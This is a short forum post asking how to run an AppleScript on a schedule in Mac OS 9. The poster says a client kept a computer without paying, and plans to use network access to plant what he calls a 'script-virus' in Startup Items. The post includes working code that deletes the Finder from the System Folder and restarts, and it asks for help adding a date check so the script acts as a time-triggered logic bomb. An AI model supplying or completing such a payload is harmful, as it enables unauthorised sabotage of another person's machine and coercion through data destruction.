I was wondering if there is any chance to run this apple script on schedule in MacOS 9. I know that it is possible in Tiger, but maybe there is some way to do it in OS 9?
I have simple script-virus that will run after I'll put it to Startup Items, but I need to put a check on time and date, if date is not that I need then the script just quit another run script. I have a client who actually stold computer and decline to pay, but I have a network access to this Mac. I want him to call me because of the system problem, this way i'll get my money. :-)
Please help!
tell application "Finder"
select file "Finder" of folder "System Folder" of startup disk
delete selection
quit all
restart
end tell